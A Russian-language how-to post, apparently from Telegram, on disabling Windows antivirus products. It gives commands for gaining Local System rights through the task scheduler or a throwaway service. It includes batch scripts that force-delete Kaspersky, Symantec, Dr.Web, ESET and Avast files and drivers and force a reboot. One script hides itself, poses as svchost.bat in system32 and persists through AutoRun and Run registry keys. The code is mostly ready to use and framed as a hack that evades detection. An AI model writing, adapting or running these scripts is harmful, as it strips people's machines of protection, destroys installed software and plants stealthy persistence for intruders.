Обучение

Обучение

Life-Hack

Антивирус обычно работает как служба, завершать его следует net stop или sc stop.​

Остановка службы SC STOP OC. Описание команды SC STOPКоманда SC STOP посылает службе операционной системы Windows запрос STOP. Для запуска остановленной службы служит команда SC START. Синтаксис и параметры команды SC STOP

sc [имя_сервера] stop имя_службы имя_сервера - Задает имя удаленного сервера, на котором находится служба. В имени следует использовать формат UNC ("\\myserver"). Чтобы запустить SC локально, этот параметр следует пропустить.Имя_службы - Указывает имя службы, возвращенное операцией getkeyname. /? - Отображает справку в командной строке.

Примеры команды SC STOP sc stop spooler - остановка службы очереди печати. Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса

На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.


Способ 1. Использование планировщика.

По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:

at 11:05 c:\killer.bat

и kill.bat запустится с правами Local System.


Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.


Способ 1. Создание службы.

Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:

sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"

net start CmdAsSystem

sc delete CmdAsSystem


При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.

Метод незаметен, никак не проявляет себя.


На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.


Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).


Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:

net stop srservice

erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"

erase /F /S /Q "%windir%\system32\drivers\kl1.sys"

erase /F /S /Q "%windir%\system32\drivers\klif.sys"

erase /F /S /Q "%windir%\system32\drivers\klbg.sys"

erase /F /S /Q "%windir%\system32\drivers\klim5.sys"

erase /F /S /Q "%windir%\system32\drivers\klmd.sys"

erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"

shutdown -r -f -c "Bye-Bye!!!"


Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):

net stop srservice

erase /F /S /Q "C:\Program Files\Symantec"

erase /F /S /Q "C:\Program Files\Norton Internet Security"

shutdown -r -f -c "Bye-Bye!!!"


Для Доктора Веба:

net stop srservice

erase /F /S /Q "C:\Program Files\DrWeb"

erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"

erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"

erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"

erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"

shutdown -r -f -c "Bye-Bye!!!"


Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай 


Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.


@echo off

attrib *.bat +h +s

cd %programfiles%\Kaspersky Lab\

del *.* /q /s

cd %programfiles%\DrWeb\

del *.* /q /s

cd %programfiles%\Alwil Software\

del *.* /q /s

cd %programfiles%\ESET\

del *.* /q /s

copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul

reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul

copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul

attrib *.bat +h +r +s


в блокноте сохраните с расширением .bat


Итак, чтобы отключить любой антивирус заходим в панель управления , после этого, ищите опцию «администрирование» и нажмите на нее. Кто не может найти, посмотрите с правой стороны вверху: там написано «просмотр», выберите «большие значки»


Выберите обычный запуск. Дальше по очереди откройте опции (нажав на них) «службы» и «автозагрузка» и везде где вам встретиться название вашего «защитника» снимайте галочки.

Надеюсь, администрирование нашли. После нажатия на него нажмите «конфигурация системы». Вам откроется еще одно окно, где и будет происходить отключение антивируса. Вам будет предложена перезагрузка, после чего он работать уже не будет.

К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.​ Источник


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org